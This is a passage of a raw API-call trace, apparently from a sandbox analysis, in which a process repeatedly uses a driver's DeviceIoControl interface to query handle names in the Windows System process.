ReturnLength=0xfffff880052b3508) returned 0x0 [0198.376] ObfDereferenceObject (Object=0xfffffa80029f2d30) returned 0x1 [0198.376] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.377] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.377] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.377] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.377] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.377] PsAcquireProcessExitSynchronization () returned 0x0 [0198.377] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.377] ObReferenceObjectByHandle (in: Handle=0xffffffff80000080, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800343b050, HandleInformation=0x0) returned 0x0 [0198.377] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.377] PsReleaseProcessExitSynchronization () returned 0x2 [0198.377] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.377] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.377] ObfDereferenceObject (Object=0xfffffa800343b050) returned 0x1 [0198.377] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.378] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.378] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.378] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.378] PsAcquireProcessExitSynchronization () returned 0x0 [0198.378] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.378] ObReferenceObjectByHandle (in: Handle=0xffffffff80000084, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ad5ca0, HandleInformation=0x0) returned 0x0 [0198.378] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.378] PsReleaseProcessExitSynchronization () returned 0x2 [0198.378] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.378] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.378] ObfDereferenceObject (Object=0xfffffa8002ad5ca0) returned 0x1 [0198.378] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.379] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.379] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.379] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0198.379] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.379] PsAcquireProcessExitSynchronization () returned 0x0 [0198.379] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.379] ObReferenceObjectByHandle (in: Handle=0xffffffff80000088, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028dfb50, HandleInformation=0x0) returned 0x0 [0198.379] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.379] PsReleaseProcessExitSynchronization () returned 0x2 [0198.379] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.379] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800314f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800314f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.379] ObfDereferenceObject (Object=0xfffffa80028dfb50) returned 0x1 [0198.379] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.379] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.379] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0198.380] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.380] PsAcquireProcessExitSynchronization () returned 0x0 [0198.380] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.380] ObReferenceObjectByHandle (in: Handle=0xffffffff8000009c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029f0270, HandleInformation=0x0) returned 0x0 [0198.380] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.380] PsReleaseProcessExitSynchronization () returned 0x2 [0198.380] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.380] ObQueryNameString (in: Object=0xfffffa80029f0270, ObjectNameInfo=0xfffffa8003150044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003150044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.380] ObfDereferenceObject (Object=0xfffffa80029f0270) returned 0x2 [0198.380] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.380] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.380] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.380] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0198.380] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.380] PsAcquireProcessExitSynchronization () returned 0x0 [0198.380] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.381] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029f0600, HandleInformation=0x0) returned 0x0 [0198.381] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.381] PsReleaseProcessExitSynchronization () returned 0x2 [0198.381] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.381] ObQueryNameString (in: Object=0xfffffa80029f0600, ObjectNameInfo=0xfffffa8003152044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003152044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.381] ObfDereferenceObject (Object=0xfffffa80029f0600) returned 0x2 [0198.381] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.381] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.381] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.381] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0198.381] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.381] PsAcquireProcessExitSynchronization () returned 0x0 [0198.381] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.381] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029f0cd0, HandleInformation=0x0) returned 0x0 [0198.381] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.381] PsReleaseProcessExitSynchronization () returned 0x2 [0198.381] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.381] ObQueryNameString (in: Object=0xfffffa80029f0cd0, ObjectNameInfo=0xfffffa8003153044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003153044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.381] ObfDereferenceObject (Object=0xfffffa80029f0cd0) returned 0x1 [0198.381] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0198.382] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.382] PsAcquireProcessExitSynchronization () returned 0x0 [0198.382] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.382] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028de340, HandleInformation=0x0) returned 0x0 [0198.382] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.382] PsReleaseProcessExitSynchronization () returned 0x2 [0198.382] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.382] ObQueryNameString (in: Object=0xfffffa80028de340, ObjectNameInfo=0xfffffa8003154044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003154044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.382] ObfDereferenceObject (Object=0xfffffa80028de340) returned 0x2 [0198.382] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.382] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.382] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.382] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0198.382] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.382] PsAcquireProcessExitSynchronization () returned 0x0 [0198.382] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.382] ObReferenceObjectByHandle (in: Handle=0xffffffff800000ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029eebd0, HandleInformation=0x0) returned 0x0 [0198.382] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.383] PsReleaseProcessExitSynchronization () returned 0x2 [0198.383] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.383] ObQueryNameString (in: Object=0xfffffa80029eebd0, ObjectNameInfo=0xfffffa8003155044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003155044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.383] ObfDereferenceObject (Object=0xfffffa80029eebd0) returned 0x2 [0198.383] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.383] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.383] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.383] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0198.383] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.383] PsAcquireProcessExitSynchronization () returned 0x0 [0198.383] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.383] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029ef210, HandleInformation=0x0) returned 0x0 [0198.383] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.383] PsReleaseProcessExitSynchronization () returned 0x2 [0198.383] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.383] ObQueryNameString (in: Object=0xfffffa80029ef210, ObjectNameInfo=0xfffffa8003156044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003156044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.384] ObfDereferenceObject (Object=0xfffffa80029ef210) returned 0x1 [0198.384] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0198.384] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.384] PsAcquireProcessExitSynchronization () returned 0x0 [0198.384] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.384] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80028df710, HandleInformation=0x0) returned 0x0 [0198.384] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.384] PsReleaseProcessExitSynchronization () returned 0x2 [0198.384] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.384] ObQueryNameString (in: Object=0xfffffa80028df710, ObjectNameInfo=0xfffffa8003157044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003157044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.384] ObfDereferenceObject (Object=0xfffffa80028df710) returned 0x2 [0198.384] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.384] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.384] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.384] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0198.385] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.385] PsAcquireProcessExitSynchronization () returned 0x0 [0198.385] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.385] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002987690, HandleInformation=0x0) returned 0x0 [0198.385] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.385] PsReleaseProcessExitSynchronization () returned 0x2 [0198.385] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.385] ObQueryNameString (in: Object=0xfffffa8002987690, ObjectNameInfo=0xfffffa8003158044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003158044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.385] ObfDereferenceObject (Object=0xfffffa8002987690) returned 0x2 [0198.385] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.385] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.385] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.385] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0198.385] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.385] PsAcquireProcessExitSynchronization () returned 0x0 [0198.385] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.385] ObReferenceObjectByHandle (in: Handle=0xffffffff800000bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002868050, HandleInformation=0x0) returned 0x0 [0198.386] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.386] PsReleaseProcessExitSynchronization () returned 0x2 [0198.386] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.386] ObQueryNameString (in: Object=0xfffffa8002868050, ObjectNameInfo=0xfffffa8003159044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003159044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.386] ObfDereferenceObject (Object=0xfffffa8002868050) returned 0x3 [0198.386] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.386] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.386] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.386] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.386] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.386] PsAcquireProcessExitSynchronization () returned 0x0 [0198.386] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.386] ObReferenceObjectByHandle (in: Handle=0xffffffff800000dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8006dff1f0, HandleInformation=0x0) returned 0x0 [0198.386] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.386] PsReleaseProcessExitSynchronization () returned 0x2 [0198.386] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.386] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.386] ObfDereferenceObject (Object=0xfffffa8006dff1f0) returned 0x1 [0198.387] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.387] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.387] PsAcquireProcessExitSynchronization () returned 0x0 [0198.387] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.387] ObReferenceObjectByHandle (in: Handle=0xffffffff80000104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8008670f20, HandleInformation=0x0) returned 0x0 [0198.387] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.387] PsReleaseProcessExitSynchronization () returned 0x2 [0198.387] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.387] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.387] ObfDereferenceObject (Object=0xfffffa8008670f20) returned 0x1 [0198.387] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.387] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.387] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.387] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0198.387] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.388] PsAcquireProcessExitSynchronization () returned 0x0 [0198.388] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.388] ObReferenceObjectByHandle (in: Handle=0xffffffff80000108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80093d1f20, HandleInformation=0x0) returned 0x0 [0198.388] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.388] PsReleaseProcessExitSynchronization () returned 0x2 [0198.388] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7b [0198.388] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.388] ObfDereferenceObject (Object=0xfffffa80093d1f20) returned 0x1 [0198.388] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.388] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.388] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.388] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, 